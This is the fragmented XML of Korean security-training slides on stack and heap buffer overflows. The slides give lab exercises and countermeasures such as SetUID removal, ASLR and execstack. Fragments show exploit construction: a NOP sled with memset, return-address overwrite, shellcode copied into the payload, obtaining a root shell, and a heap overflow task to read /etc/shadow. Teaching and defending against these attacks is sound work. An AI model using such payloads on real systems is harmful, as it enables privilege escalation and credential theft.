              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>o exploit exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec/exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일을 이용한 페이로드 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$ ./exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>28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7" name="Picture 68">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70E56183-D24B-467D-8876-01211AFE7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" b="1886"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="520699" y="866624"/>
            <a:ext cx="4901983" cy="270207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70">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25CF1106-5283-424F-AF5B-97A01DDAC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" t="4646" r="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="550327" y="4311650"/>
            <a:ext cx="4925568" cy="51188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72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A24B75ED-6B35-4C94-AB13-3FC6A450D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" t="-277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="550327" y="5334930"/>
            <a:ext cx="4929506" cy="70616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18F384F-0013-4CBA-BB0F-60762091DAD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6265233" y="493694"/>
          <a:ext cx="5475010" cy="4580825"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2486881">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3675159690"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2988129">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="574915489"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="212013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84636"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="433982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먼저 페이로드를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채운다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memset (&amp; buffer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0x90, 517); //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nop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>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>buffer </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>버퍼 시작 주소 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>+ 28</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>에 복귀 주소가 저장된다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"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</a:rPr>
                        <a:t>복귀 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>주소는 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>buffer </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>버퍼 시작 주소 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>+ 32</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>가 저장된다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"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effectLst/>
                        </a:rPr>
                        <a:t>즉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다음과 같은 페이로드가 준비된다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((long *)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(buffer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+ off)) = (long)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(buffer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+ off + 4);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000" dirty="0"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631132"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49155" name="_x564938936">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88597877-B49A-47BC-BAEF-49FD6738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29" y="1876626"/>
            <a:ext cx="2298877" cy="310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4" name="_x564941312">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DAC8B12-17AD-4D77-8624-505DB0302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636" y="1876626"/>
            <a:ext cx="2298877" cy="310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3B1750-BBDB-4A5D-932C-555DCB1F22CE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912D2A2-974C-4D35-B0BA-0858CAC749C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7A27E9-BB2D-41E3-B51E-46BA51DF3FC4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A077C7EA-A0C4-466B-8124-6B7D9EE6C4DC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28240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8) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일을 실행하여 루트 쉘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./stack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49CFF3B-8277-4780-B382-55D6783068EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="552010" y="531791"/>
          <a:ext cx="5029640" cy="4023880"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5029640">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3675159690"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="26780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084636"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3756073">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>마지막으로 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>쉘코드를</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> 페이로드 마지막 부분에 복사해 넣는다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                          <a:effectLst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memcpy (buffer + sizeof (buffer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- sizeof (shellcode), shellcode, sizeof (shellcode))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3147" marR="13147" marT="3635" marB="363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025249"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="_x564957368">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{507E7344-3FC1-430B-AB6B-CAD87F5EA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95" y="1396921"/>
            <a:ext cx="2277247" cy="307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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE841136-D24E-4F8C-98EB-335D1FE02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" t="2082"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="5137297"/>
            <a:ext cx="4903081" cy="59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AC1FD6-2A5F-46CF-AE10-D0CB522CC28D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루트 쉘을 획득한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>상태에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>acheck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acheck</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1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C04FE9-5AA5-45D2-917E-75E7A4694F30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62520C4-69C6-43DC-B25D-3085BBC6C4AB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61F6CE-640E-4B4A-B452-4CB037E1E0C1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B3E00A10-1226-4A04-B94C-84962153F971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00369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보안 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6642C97-AE41-486C-BE08-8D12FAF98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/Training/Unit/Sys/9</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 9. BOF - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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쉘코드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실행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대응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/stack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오버플로우를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통해 쉘 코드가 실행되지 않도록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대응하시오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접근 권한 변경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접근권한 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ASLR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sysctl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 kernel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc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randomize_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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc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_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space=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값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실행 방지 설정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execstack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139A787F-55D9-4280-A8E7-48BDE3B1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C3DFF4-2FD7-4BB3-B403-C968BA8BCA13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95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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="95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쉘코드를</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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주입 및 실행할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="95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5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스택 버퍼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이용한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="95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쉘코드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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주입 공격에 대응할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="95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5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D80CE4A-C2E9-4560-8E50-EB848B2EAE7C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C3017B1-DBDF-418B-BC4C-BD9FA0CFACFC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F0DE2446-C02B-47FA-9538-513B519A1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4D0FFD-0653-4F8F-8056-CFE9FBC86D85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5.11, 32-bit)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="10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6B0DA0-CF87-4217-BA6E-21FF424C1CDB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C50A4C0-C1BB-4488-87A0-07928015F51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8F201F-2885-494C-B5EA-7C4A69EAB1AD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" name="화살표: 오른쪽 25">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5D75FCD-6725-40D7-A146-4937F85BA7B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2146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/>
              <a:t>/sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 설정됨을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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/stack*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stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>SetUID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>설정 해제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u-s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/stack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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/stack*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ASLR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>활성화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sysctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>w kernel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>randomize_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>va</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>space=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ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>스택 실행 방지 설정 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execstack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>–c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/stack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execstack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>–q </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/stack</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 84">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C7DBDD6-CBB4-41A5-9432-8FEB5F7C7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833966"/>
            <a:ext cx="4727194" cy="5410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86">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5661EAAE-E448-42C9-A743-DC8DACC6B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1" r="2302" b="19042"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="483152" y="2149362"/>
            <a:ext cx="4958142" cy="641521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CA759F0-00FE-4ADB-B599-D6E8C0B1728C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="483152" y="2880142"/>
          <a:ext cx="4932807" cy="2443353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163277480"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="23408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18803"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="201225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SetUID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해제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실행하면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쉘코드가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실행되기는 하지만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root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권한이 아닌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실행한 계정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 그림의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경우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권한을 가지는 쉘이 나타난다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816622"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="53249" name="_x1658446056">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3A57FB5-7F34-409E-850A-FA077295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19" y="3671797"/>
            <a:ext cx="4779963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8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A6A4311-731E-4CA8-BFC4-6D2BBC40C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52" y="5773673"/>
            <a:ext cx="4983480" cy="5562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E78BD65-C113-4787-9C38-CB1A8A9FEA44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6282989" y="470112"/>
          <a:ext cx="4932807" cy="317417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95635228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156180"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="26866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ASLR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실행하면 실행시마다 주소가 변경되어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쉘코드가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실행되지 않는다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공격자는 스크립트 등을 사용하여 성공할 때까지 반복함으로써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쉘코드를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실행시킬 수도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66370" marR="0" indent="-16637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149480"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="53251" name="_x617035992">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03B9E9A5-A524-47B8-B9D1-99DEDA946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" t="325"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6384472" y="1719795"/>
            <a:ext cx="4742542" cy="176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0">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CE4F803-2A1D-408C-BE49-1E5975DE8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989" y="4521813"/>
            <a:ext cx="4503420" cy="541020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FC0D6E-5653-432A-B10A-3E0EDD8A38AB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257331A-9C23-4EF9-BF76-BD7F10A19E7C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DE410D5-8201-4E91-8981-B9EA3BFD0B7D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2F274F48-80C7-42DF-A2A9-14023AB1B65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052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3.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1">
                <a:ea typeface="HY헤드라인M" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>모바일</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:ea typeface="HY헤드라인M" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> 운영체제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81554" y="836713"/>
            <a:ext cx="8291264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endParaRPr lang="ko-KR" altLang="en-US" sz="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3.2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운영체제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최신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모바일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운영체제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89" y="2276872"/>
            <a:ext cx="7976002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808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C4553F-CF47-4982-BAED-66DAB834C2FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="620276" y="498663"/>
          <a:ext cx="4932807" cy="293033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862917401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016968"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="252044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스택 실행 방지 설정 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stack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실행하면 스택 내에 존재하는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쉘코드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자체의 실행이 불가능하게 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416208"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="56321" name="_x1658344864">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72AC8636-B837-4BB9-B28F-49DD5F96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0" y="1311503"/>
            <a:ext cx="4770438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E17C4A-3B31-4DDC-AF8F-C53104642EDB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check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>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check </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1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4EFB41-A839-4942-B067-E5C42D9F4F16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3795B63-DDAA-4482-B875-5A0C980BA188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690D8B-DF94-4BFB-9CDD-FAAEFD112596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" name="화살표: 오른쪽 11">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C8F88F4-67B1-4644-816D-F049F6B74543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14605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/Training/Unit/Sys/10</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 10. BOF -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힙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/bof64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 존재하는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취약점을 이용하여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/shadow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내용을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출력하시오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test / test123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BOF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BOF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취약점에 대응할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EFB03D-34B9-4EE6-85B6-79AF701BA0F5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80C0A1CA-A354-4356-922E-F509B5745B62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F83B7B-F873-4C64-A599-22B2D19FCB7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67C74A80-9583-4D92-800C-344EF6D87B88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8825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cd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec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/>
              <a:t>/sec/heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000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ls –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>l heap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/>
              <a:t>/sec/heap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>소스 파일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vim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec/heap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>.c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/>
              <a:t>/sec/goodfile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 내용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cat goodfile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/>
              <a:t>/sec/heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일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/sec/heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>AAAA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/>
              <a:t>※ username </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>블록과 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>filename </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>블록 간의 거리가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x70(=112) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>바이트임을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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 92">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{571A0F24-991F-415E-A73C-B4EAAC47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50" y="1308062"/>
            <a:ext cx="3931920" cy="67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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E16244EA-4DD3-4DB4-82AB-E12B2160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50" y="2572320"/>
            <a:ext cx="4954143" cy="275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96">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CEE197C-F394-412F-8A5A-427406107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" t="7386"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="505350" y="5778500"/>
            <a:ext cx="3059320" cy="50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98">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE075564-BEE4-4DC3-AF46-CA34416639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7" t="2533" b="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6303893" y="852446"/>
            <a:ext cx="3729355" cy="12625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22514E9-35C9-4437-B2C6-2C1F069FC0E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6303893" y="2416397"/>
          <a:ext cx="4932807" cy="268649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588396129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712301"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="21920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힙의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114587"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="57345" name="_x570528760">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D34F5E5-1CDA-4753-B23F-F4B742DB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727" y="3007517"/>
            <a:ext cx="4783138" cy="18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D8EF467-838B-401E-8C44-EF9C0969A91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2887E6CE-FA27-4E84-A8B5-629D20E6744C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B57CA6-41C8-4B86-8288-641600675A0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7E42FEDF-AC64-48DC-8741-0850E5A3D2C9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2064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5) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>힙</a:t>
            </a:r>
            <a:r>
